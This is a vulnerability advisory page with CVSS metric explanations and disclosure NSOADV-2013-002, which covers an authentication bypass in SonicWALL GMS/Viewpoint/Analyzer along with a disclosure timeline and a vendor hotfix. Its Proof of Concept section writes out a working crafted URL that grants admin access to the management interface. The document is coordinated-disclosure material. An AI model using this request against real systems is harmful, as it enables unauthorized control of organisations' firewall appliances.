The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
None
PR
The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
______________________________________________________________________
-------------------------- NSOADV-2013-002 ---------------------------
SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/sgms/)
______________________________________________________________________
______________________________________________________________________
111101111
11111 00110 00110001111
111111 01 01 1 11111011111111
11111 0 11 01 0 11 1 1 111011001
11111111101 1 11 0110111 1 1111101111
1001 0 1 10 11 0 10 11 1111111 1 111 111001
111111111 0 10 1111 0 11 11 111111111 1 1101 10
00111 0 0 11 00 0 1110 1 1011111111111 1111111 11 100
10111111 0 01 0 1 1 111110 11 1111111111111 11110000011
0111111110 0110 1110 1 0 11101111111111111011 11100 00
01111 0 10 1110 1 011111 1 111111111111111111111101 01
01110 0 10 111110 110 0 11101111111111111111101111101
111111 11 0 1111 0 1 1 1 1 111111111111111111111101 111
111110110 10 0111110 1 0 0 1111111111111111111111111 110
111 11111 1 1 111 1 10011 101111111111011111111 0 1100
111 10 110 101011110010 11111111111111111111111 11 0011100
11 10 001100 0001 111111111111111111 10 11 11110
11110 00100 00001 10 1 1111 101010001 11111111
11101 0 1011 10000 00100 11100 00001101 0
0110 111011011 0110 10001 101 11110
1011 1 10 101 000001 01 00
1010 1 11001 1 1 101 10
110101011 0 101 11110
110000011
111
______________________________________________________________________
______________________________________________________________________
Title: SonicWALL GMS/Viewpoint/Analyzer
Authentication Bypass (/sgms/)
Severity: Critical
CVE-ID: CVE-2013-1360
CVSS Base Score: 9
Impact: 8.5
Exploitability: 10
CVSS2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:C
Advisory ID: NSOADV-2013-002
Found Date: 2012-04-26
Date Reported: 2012-12-13
Release Date: 2013-01-17
Author: Nikolas Sotiriu
Website: http://sotiriu.de
Twitter: http://twitter.com/nsoresearch
Mail: nso-research at sotiriu.de
URL: http://sotiriu.de/adv/NSOADV-2013-002.txt
Vendor: DELL SonicWALL (http://www.sonicwall.com/)
Affected Products: GMS
Analyzer
UMA
ViewPoint
Affected Platforms: Windows/Linux
Affected Versions: GMS/Analyzer/UMA 7.0.x
GMS/ViewPoint/UMA 6.0.x
GMS/ViewPoint/UMA 5.1.x
GMS/ViewPoint 5.0.x
GMS/ViewPoint 4.1.x
Remote Exploitable: Yes
Local Exploitable: No
Patch Status: Vendor released a patch (See Solution)
Discovered by: Nikolas Sotiriu
Background:
===========
The SonicWALL® Global Management System (GMS) provides organizations,
distributed enterprises and service providers with a powerful and
intuitive solution to centrally manage and rapidly deploy SonicWALL
firewall, anti-spam, backup and recovery, and secure remote access
solutions. Flexibly deployed as software, hardware, or a virtual
appliance, SonicWALL GMS offers centralized real-time monitoring, and
comprehensive policy and compliance reporting. For enterprise customers,
SonicWALL GMS streamlines security policy management and appliance
deployment, minimizing administration overhead. Service Providers can
use GMS to simplify the security management of multiple clients and
create additional revenue opportunities. For added redundancy and
scalability, GMS can be deployed in a cluster configuration.
(Product description from Website)
Description:
============
DELL SonicWALL GMS/Analyzer/ViewPoint contains a vulnerability that
allows an unauthenticated, remote attacker to bypass the Web interface
authentication offered by the affected product.
The vulnerability is attributed to a broken session handling in the
process of password change process of the web application.
changing in the web application.
An attacker may exploit this vulnerability by sending a specially
crafted request to the SGMS Interface (/sgms/).
The attacker gains full administrative access to the interface and
full control over all managed appliances, which could lead to a full
compromisation of the organisation.
Proof of Concept :
==================
Access the following URL to login to the sgms interface:
http://host/sgms/auth?clientHash=765c5e5b571050030b63666663383064663
83761376339303932346163656262&clientHash2=03196ba18cffc80df87a7c9092
4acebb&changePassword=1&user=admin&ctlSGMSDomainId=DMN00000000000000
00000000001
If the Console is not directly shown, type any password you
want in the change password dialog twice and hit submit to login.
Maybe you need to access the following URL after this process:
http://host/sgms/auth
Solution:
=========
Install Hotfix 125076.77. (Download from www.mysonicwall.com)
Disclosure Timeline:
====================
2012-04-26: Vulnerability found
2012-12-12: Sent the notification and disclosure policy and asked
for a PGP Key ([email protected])
2012-12-13: Sent advisory, disclosure policy and planned disclosure
date (2012-12-28) to vendor
2012-12-18: SonicWALL analyzed the finding and wishes to delay the
release to the 3. calendar week 2013.
2012-12-18: Changed release date to 2013-01-17.
2012-12-20: Patch is published
2013-01-17: Release of this advisory
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum